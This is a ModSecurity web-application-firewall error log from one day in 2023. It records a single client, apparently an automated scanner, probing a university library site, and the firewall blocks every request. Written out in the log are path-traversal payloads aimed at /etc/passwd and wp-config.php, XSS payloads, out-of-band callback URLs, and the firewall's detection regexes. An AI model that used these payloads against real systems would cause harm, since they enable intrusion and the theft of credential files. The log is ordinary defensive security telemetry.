[Tue Aug 29 11:54:38.676089 2023] [:error] [pid 2713] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16DsCo-f0AAAqZuaAAAAAs"]
[Tue Aug 29 11:54:39.883090 2023] [:error] [pid 2649] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_cb955ad0647d3651c348d2641017377fe3d6211a"): Internal error [hostname "digilibfeb.unla.ac.id"] [uri "/config.inc.php-sample.php"] [unique_id "ZO16D8Co-f0AAApZHXMAAAAf"]
[Tue Aug 29 11:54:40.529673 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAAolKjEAAAAe"]
[Tue Aug 29 11:54:41.612892 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAAqQ@u4AAAAB"]
[Tue Aug 29 11:54:41.639959 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilibfeb.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAApXggMAAAAU"]
[Tue Aug 29 11:54:44.539708 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAApV24cAAAAJ"]
[Tue Aug 29 11:54:46.655821 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAAqQ@v4AAAAB"]
[Tue Aug 29 11:54:47.596405 2023] [:error] [pid 2713] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAAqZubMAAAAs"]
[Tue Aug 29 11:54:50.583833 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAApXghQAAAAU"]
[Tue Aug 29 11:54:50.619168 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAAqXySAAAAAq"]
[Tue Aug 29 11:54:51.553240 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16G8Co-f0AAAqQ@wsAAAAB"]
[Tue Aug 29 11:54:51.579091 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16G8Co-f0AAApHRZoAAAAP"]
[Tue Aug 29 11:54:52.608071 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAAoAk8EAAAAC"]
[Tue Aug 29 11:54:54.032781 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HsCo-f0AAAqY58YAAAAr"]
[Tue Aug 29 11:54:55.580613 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0aajiqgude9h8s.oast.site found within TX:1: cjmnijtjmimvgniikdb0aajiqgude9h8s.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16H8Co-f0AAAoAk8kAAAAC"]
[Tue Aug 29 11:54:55.805543 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAAqUB68AAAAb"]
[Tue Aug 29 11:54:56.791360 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAAqhOAgAAAAE"]
[Tue Aug 29 11:54:58.223511 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IsCo-f0AAAqY59sAAAAr"]
[Tue Aug 29 11:54:58.223575 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IsCo-f0AAAqY59sAAAAr"]
[Tue Aug 29 11:54:58.320614 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAAqWwcIAAAAl"]
[Tue Aug 29 11:54:59.567797 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAAoesRQAAAAV"]
[Tue Aug 29 11:54:59.715770 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/login/"] [unique_id "ZO16I8Co-f0AAAoAk90AAAAC"]
[Tue Aug 29 11:55:02.614972 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAAqhOCMAAAAE"]
[Tue Aug 29 11:55:03.569145 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16J8Co-f0AAAoAk@cAAAAC"]
[Tue Aug 29 11:55:04.619136 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAAqY5-AAAAAr"]
[Tue Aug 29 11:55:05.955414 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KcCo-f0AAApa-LkAAAAg"]
[Tue Aug 29 11:55:05.959139 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KcCo-f0AAAqRzIwAAAAM"]
[Tue Aug 29 11:55:06.651169 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAApOdhEAAAAL"]
[Tue Aug 29 11:55:07.720177 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16K8Co-f0AAAqeFRUAAAAx"]
[Tue Aug 29 11:55:08.542865 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAAqeFRcAAAAx"]
[Tue Aug 29 11:55:11.675526 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAAqeFR0AAAAx"]
[Tue Aug 29 11:55:11.881437 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16L8Co-f0AAAqqtbgAAAAA"]
[Tue Aug 29 11:55:12.645354 2023] [:error] [pid 2638] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAApOdiQAAAAL"]
